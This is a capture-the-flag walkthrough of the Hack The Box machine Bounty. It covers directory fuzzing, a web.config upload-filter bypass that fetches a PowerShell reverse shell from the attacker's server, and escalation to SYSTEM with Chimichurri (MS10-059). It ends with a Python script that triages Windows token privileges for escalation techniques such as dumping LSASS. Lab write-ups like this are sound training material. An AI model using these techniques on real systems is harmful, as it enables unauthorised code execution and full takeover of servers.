first enumeration with nmap
# Nmap 7.93 scan initiated Fri Jun 2 10:03:16 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 80 -Pn 10.10.10.93
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.19s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 2 10:03:30 2023 -- 1 IP address (1 host up) scanned in 14.22 seconds
opening the IP in a browser, we get redirected to a page with a Merlin picture and nothing else. let's fuzz for directories, adding -x aspx since the server is IIS/ASP.NET
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Bounty]
└─$ gobuster dir -u http://10.10.10.93/ -w /usr/share/wordlists/dirb/common.txt -x aspx
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: aspx
[+] Timeout: 10s
===============================================================
2023/06/03 01:14:29 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
Progress: 9219 / 9230 (99.88%)
===============================================================
2023/06/03 01:17:01 Finished
===============================================================
navigate to transfer.aspx, there is a file upload function there. tried to upload an .aspx reverse shell, got "Invalid File. Please try again".
let's fuzz for the extensions that are allowed: repeat the same upload request with a dummy file, cycling through a list of extensions, and see which ones don't come back with the Invalid File message.
cool, we can see the allowed extensions: .config, .doc, ... and .config is the interesting one. IIS 7.5 honours a web.config dropped into a web-accessible directory, so the file can register a handler that runs *.config through the classic ASP engine and then carry ASP code after the closing </configuration> tag (inside an XML comment, so the config still parses).
let's look for a .config revshell payload we can create. cool, we found one on GitHub (web.config), let's download the file and point its PowerShell download cradle at our IP. we also need an Invoke-PowerShellTcp.ps1 file (from Nishang); the usual approach is to append an Invoke-PowerShellTcp -Reverse line with our IP and port at the end of the script so it calls back as soon as it is loaded. fire up a python http server along with an ncat listener.
upload the web.config file. let's locate the file: gobuster already found /uploadedfiles/, so that is where to look. request the file in the browser and check back on the ncat listener.
Bull's eye, we got a reverse shell.
Privilege Escalation
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\windows\system32\inetsrv>
checking privs, the one that matters is SeImpersonatePrivilege, which is enabled (SeChangeNotifyPrivilege is on every token and is no use for escalation). on an IIS 7.5 / Windows Server 2008 R2 box that can be abused with Chimichurri.exe, the MS10-059 exploit, which uses the impersonation privilege to obtain a SYSTEM token and spawn a reverse shell. let's abuse this: start another ncat listener, get Chimichurri.exe onto the box and run it from the shell we have.
running chimichurri.exe IP PORT
got a reverse shell as nt authority\system.
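An added Python example, not from the writeup: a small triage of whoami /priv output that flags the privileges actually worth escalating with, so SeImpersonatePrivilege stands out and SeChangeNotifyPrivilege does not. The sample input is constructed from the listing above; the privilege-to-technique notes are our own summary.

```python
import re

# Constructed sample: the whoami /priv listing from the IIS shell above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that usually mean a path to SYSTEM; the technique notes are our
# own summary, not from the writeup.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token: Chimichurri (MS10-059) on 2008 R2, potato family on newer builds",
    "SeAssignPrimaryTokenPrivilege": "same token-impersonation exploits as SeImpersonatePrivilege",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeDebugPrivilege": "open and inject into SYSTEM processes, dump LSASS",
    "SeLoadDriverPrivilege": "load a signed but vulnerable driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# One privilege row: name, free-text description, then the state column.
PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_privs(output: str) -> dict:
    """Return {privilege name: 'Enabled'|'Disabled'} from whoami /priv output,
    skipping the banner and the column-header lines."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE_RE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def triage(output: str) -> list:
    """List (privilege, state, note) for every abusable privilege in the token.
    'Disabled' only means the privilege is not currently switched on; it is
    still held, and the process can turn it on with AdjustTokenPrivileges, so
    it is reported rather than ignored.  SeChangeNotifyPrivilege and the other
    defaults are deliberately absent from ABUSABLE: every token has them."""
    findings = []
    for name, state in parse_privs(output).items():
        if name in ABUSABLE:
            note = ABUSABLE[name]
            if state == "Disabled":
                note += " (held but not enabled; enable it first)"
            findings.append((name, state, note))
    return findings


if __name__ == "__main__":
    for name, state, note in triage(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {note}")
```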